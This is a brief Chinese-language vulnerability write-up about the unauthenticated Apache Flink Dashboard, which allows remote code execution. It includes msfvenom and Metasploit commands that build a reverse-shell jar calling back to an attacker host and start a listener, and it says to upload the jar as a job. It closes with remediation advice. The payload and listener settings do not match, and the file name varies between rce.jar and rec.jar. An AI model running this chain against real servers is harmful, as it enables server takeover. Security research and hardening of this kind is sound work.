概述
风险等级:高
缺陷描述:
Apache Flink Dashboard默认没有用户权限认证,攻击者可以通过未授权的Flink Dashboard控制台直接上传木马jar包,可远程执行任意系统命令获取服务器权限。
危害描述:
该漏洞可导致代码执行。
漏洞复现:
访问web页面。
利用msfovenom生成rce.jar
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.0.131 LPORT=4444 -f jar > rce.jar
配置msf监听
use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST 192.168.0.131
set LPORT 4444
show options
run
在Submit New Job处上传rec.jar文件,点击submit。
成功getshell。
修复建议
1.针对Apache Flink Dashboard 设置防火墙策略;
2.禁止Dashboard对外访问或确保只对可信端点开放;
3.仅允许白名单IP进行访问,并在Web代理中增加对该服务的Digest认证,防止未授权访问。
注:该文章仅限技术学习